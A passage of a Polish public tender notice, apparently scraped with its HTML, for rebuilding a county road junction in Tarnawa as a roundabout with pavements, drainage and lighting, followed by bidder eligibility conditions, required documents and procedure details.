powiatowej z dwoma drogami gminnymi.Szczegółowy opis zadania stanowi dokumentacja projektowa stanowiąca załącznik nr E do SIWZ. Zadanie 3 - realizowane z decyzja pozwolenia na budowę 602/2017 z dnia 13.09.2017 Przedmiotem zadania jest: ,,Przebudowa skrzyżowania dróg powiatowych nr 1619K i nr 2071K oraz budowa chodnika wzdłuż drogi powiatowej nr 2071K w m. Tarnawa wraz z odwodnieniem i oświetleniem. Zakres inwestycji na odcinku nr III dotyczy rozbudowy drogi powiatowej nr 2071K Łąkta Górna - Łapanów w miejscowości Tarnawa, w Gminie Łapanów i dotyczy przebudowy skrzyżowania drogi powiatowej nr 2071K z drogą powiatową nr 1619K wraz z budową chodnika przy drodze 2071K, w km 10+093 - 10+283 wg kilometrażu drogi 2071K. Przebudowa skrzyżowania dróg powiatowych zakłada zastąpienie istniejącego - klasycznego skrzyżowania, skrzyżowaniem w formie ronda oraz budowę chodników dla pieszych wokół tarczy ronda.Stan istniejący:Istniejące skrzyżowanie jest skrzyżowaniem o trzech wlotach, z trójkątną wyspą.Krzyżujące się drogi powiatowe: nr 1619 K Tarnawa - Stare Rybie i nr 2071 K Łąkta Górna - Łapanów mają nawierzchnię bitumiczną o szerokości 4,90 m i 6,00 m.Wzdłuż drogi nr 1619 K po prawej stronie biegnie chodnik szerokości 1,50 m.Przy drodze nr 2071 K wzdłuż szkoły po prawej stronie za rowem biegnie chodnik szerokości 1,50 m.Istniejące uzbrojenie stanowią: linie elektroenergetyczne, linie teletechniczne, gazociągi, wodociągi oraz kanalizacja opadowa i sanitarna.W granicach opracowania nie występują skrzyżowania z innymi drogami, jednakże występują zjazdy indywidualne.Stan docelowy:Na skrzyżowaniu dróg powiatowych nr 1619 K Tarnawa - Stare Rybie i nr 2071 K Łąkta Górna - Łapanów zaprojektowano rondo o trzech wlotach.Średnica zewnętrzna - 22 m, pas ruchu - 5,00 m, pierścień wewnętrzny - 12,00 m.Łuki wyokrąglające wloty i wyloty: R=10 m.Wlot drogi nr 1619 K i drogi nr 2071 K od strony Łapanowa skanalizowano wysepką równoległą dł. 6 m, szer. 1,00 m.Wlot drogi nr 2071 K od strony Łąkty Górnej skanalizowano wysepką równoległą dł. 10,5 m, szer. 2,50 m z azylem dla pieszych długości 4,00 m.Wokół ronda zaprojektowano chodniki szer. 2,20 m.Oś drogi nr 2071 K wyokrąglona została łukami o promieniach: R=40 i R=100.Oś drogi nr 1619 K na włączeniu do ronda wyokrąglona jest łukiem R=30.Przy drodze nr 2071 K w miejscu istniejącej zatoki autobusowej, która zostanie rozebrana, zaprojektowano nową zatokę o szerokości 3,00 m, z peronem szerokości 2,20 m i długości 20,00 m, ze skosem wjazdowym 1: 8 długości 24,00 m i skosem wyjazdowym 1: 4 o długości 12,00 m. Krawężniki wyokrąglono łukami o promieniu R=30 m. Wiata przystankowa zostanie ustawiona na wybrukowanym peronie.Kolektory kanalizacji opadowej projektuje się z rur kanalizacyjnych kielichowych PCV łączonych na uszczelki gumowe średnicy DN400 mm i DN600 mm, (SN 8 kN/m2), przykanaliki od studzienek wodościekowych zaprojektowano z rur DN 200 mm. Wpusty wodościekowe żeliwne wpuszczone w krawężnik, z częścią osadnikową.Projekt obejmuje zagadnienia związanie z oświetleniem skrzyżowania /ronda/ oraz przejść dla pieszych z przyłączeniem oświetlenia do sieci dystrybucyjnej Przedsiębiorstwa Energetycznego.Przyjęto następujące parametry projektowe:Parametry geometryczne przyjęto zgodnie z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r.- prędkość projektowa Vp=50 km/h, na rondzie Vp=30 km/h- klasa dróg Z- obciążenie 115 kN/oś- kategoria ruchu KR3- szerokość pasa ruchu 3,00 m- szerokość chodnika 1,50 m, 2,20 m, 2,50 m - pochylenia podłużne niwelety od 0,4% do 3,1%- jezdnie - nawierzchnia bitumiczna- wyspa przejezdna - nawierzchnia z kostki kamiennej, granitowej- średnica ronda 22 m- szerokość jezdni na rondzie 5,00 m- średnica wyspy 12,00 m- nawierzchnia chodników i zjazdów - z kostki brukowej betonowejZatoka autobusowa:- nawierzchnia z kostki brukowej betonowej na podbudowie z betonu cementowego- szerokość zatoki 3,00 m- skos wjazdowy 1: 8, skos wyjazdowy 1:4- promienie wyokrąglające R=30Łącznie w zakresie odcinka nr III planuje się:o budowę chodników o długości 279 m; strona lewa 198 m, strona prawa 81 m,o przebudować drogę na długości 190 m,o wybudować 1 zatokę autobusową,o wybudować 1 wyniesione przejście dla pieszych, i 1 próg zwalniającyo wyposażyć jezdnię w ulepszone pobocza o szerokości 1 m o łącznej długości 27 m,o przebudować 1 klasyczne skrzyżowania dróg powiatowych na skrzyżowanie typu rondo.Szczegółowy opis zadania stanowi dokumentacja projektowa stanowiąca załącznik nr F do SIWZ.3.3	Szczegółowy opis przedmiotu zamówienia zawiera: 1.	Wzór umowy -załącznik B 2.	Przedmiar robót - załącznik C do SIWZ 3.	Dokumentacja projektowa załącznik D, E, F, 4.	Pozwolenie na budowę nr 398/2017 z dnia 16.06.2017, 602/2017 Z dnia 13.09.20175.	Decyzją nr 2/2017 o zezwoleniu na realizację inwestycji drogowej6.	Kosztorys ofertowy zał. A.1 7.	Uzupełnienie STWIOR 3.4	Nawierzchnie bitumiczne należy wykonać dla kategorii ruchu KR3 z betonu asfaltowego. Warstwę ścieralną należy wykonać z masy AC 11S. Na wszystkich odcinkach należy wykonać nawierzchnię bitumiczne dla kategorii KR3 z betonu asfaltowego AC 11S.3.5	Zamawiający dopuszcza zastosowanie rur PP, które spełnią wymagania dokumentacji projektowej i oczekiwania Zamawiającego sprecyzowane w dokumentacji przetargowej. W przypadku oferowania materiałów równoważnych Wykonawca zobowiązany jest uzyskać ich akceptację Zamawiającego po przedstawieniu dowodów (np. dokumenty, karty techniczne itp.) potwierdzający ich zgodność z materiałami wymienionymi w dokumentacji projektowej.3.6	Zamawiający dopuszcza zastosowanie innych/zamiennych konstrukcji, które spełnią wymagania techniczne i oczekiwania Zamawiającego sprecyzowane w zamieszczonej dokumentacji technicznej. W przypadku oferowania materiałów lub rozwiązań równoważnych, Wykonawca zobowiązany jest uzyskać akceptację Zamawiającego po przedstawieniu dowodów (np. dokumenty, karty techniczne itp.) potwierdzających ich zgodność z materiałami wymienionymi w dokumentacji technicznej</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45000000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111200-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45232411-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233220-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233260-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233294-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233290-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45216110-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233280-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233162-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233150-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233221-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233222-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233223-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233142-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45232452-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233129-9</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, tekst jednolity (Dz.U. z 2017 r. poz. 1579), w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy robót budowlanych zamówień o wartość nie większej niż 250 000,00 zł netto i polegających na powtórzeniu podobnych robót budowlanych. </span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-11-29</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">SIWZ z załącznikami </span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Wykonawca spełni warunek dotyczący zdolności technicznej lub zawodowej, o którym mowa w pkt 5.2.1. lit. c) SIWZ, jeżeli wykaże, że:a) wykonał nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,- co najmniej dwóch robót budowlanych polegających na budowie przebudowie remoncie lub rozbudowie drogi o nawierzchni asfaltowej o wartości min. 2 000 000,00 zł netto Zamawiający dokona oceny spełnienia powyższego warunku na zasadzie: spełnia - nie spełnia, w oparciu o: oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr A2 do SIWZ) oraz wykazie robót (załącznik nr 1 do SIWZ zgodnie z pkt. 6.3 lit. a SIWZ, wykaz robót wraz z dowodami, o których mowa w paragrafie 2 ust. 4 ppkt. 1 Rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia - (Dz.U. 2016r., poz.1126, Dz.U. 2018r., poz.1993) b) dysponuje następującymi narzędziami, wyposażeniem zakładu oraz urządzeniami technicznymi dostępnymi wykonawcy w celu wykonania zamówienia publicznego:nie dotyczy c) dysponuje następującymi osobami skierowanymi przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za wykonanie zadania: - co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej. (uprawniające do kierowania robotami drogowymi na drogach klasy ,,Z" Zamawiający dokona oceny spełnienia powyższego warunku na zasadzie: spełnia - nie spełnia, w oparciu o: oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr A2 do SIWZ) oraz wykazie osób (załącznik nr 3 do SIWZ, o którym mowa w paragrafie 2 ust. 4 ppkt. 10 1 Rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia - (Dz.U. 2016r., poz.1126, Dz.U. 2018r., poz.1993)</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">SIWZ z załącznikami </span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">6.5	W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu zamawiający żąda następujących dokumentów:1)	Odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 Pzp;2)	Oświadczenie wykonawcy o braku wydania prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji -dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności; ( załącznik nr 3 do SIWZ) 3)	Oświadczenia wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne; ( załącznik nr 4 do SIWZ) 4)	Oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.( załącznik A3 do SIWZ) </span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">6.3	W celu potwierdzenia spełniania warunku dotyczącego zdolności technicznej lub zawodowej, o którym mowa w pkt 5.3.3. SIWZ, zamawiający żąda od wykonawcy:a)	wykazu robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku dotyczącego zdolności technicznej lub zawodowej wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz, których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz, którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty; - wzór załącznik 1 do SIWZb)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za projektowanie oraz kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami,- wzór załącznik 2 do SIWZ</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 6.5. SIWZ:1)	ppkt 1 - składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:a.	nie otwarto jego likwidacji ani nie ogłoszono upadłości2. Zamawiający żąda od wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a Pzp, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt 6.5. ppkt. 1-3 SIWZ.3. Do oferty wykonawca dołącza aktualne na dzień składania ofert oświadczenie w zakresie wskazanym przez zamawiającego w ogłoszeniu o zamówieniu i w specyfikacji istotnych warunków zamówienia. Informacje zawarte w oświadczeniu stanowią wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. Wzór oświadczenia stanowi Załącznik nr A2 do SIWZ.4. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu, zamieszcza informacje o tych podmiotach w oświadczeniu, o którym mowa w pkt 8.1. SIWZ. 5.8.21	Wymagane dokumenty i oświadczenia, które należy złożyć wraz z ofertą:a)	Wypełniony formularz oferty - załącznik A do SIWZ, b)	Pełnomocnictwo, jeżeli dotyczy w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem przez notariusza.c)	Kosztorys ofertowy - załącznik A1 d)	Aktualne na dzień składania ofert oświadczenie ( zgodnie z pkt. 8.1,8.2,8.3 SIWZ) - Załącznik nr A2 do SIWZ.e)	Zobowiązanie podmiotów trzecich, jeżeli dotyczy - załącznik nr A4 f)	Dowód wniesienia wadium </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">10.1	Zamawiający żąda wniesienia wadium w kwocie 10 000,00 zł.10.2	Wadium wnosi się przed upływem terminu składania ofert.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid 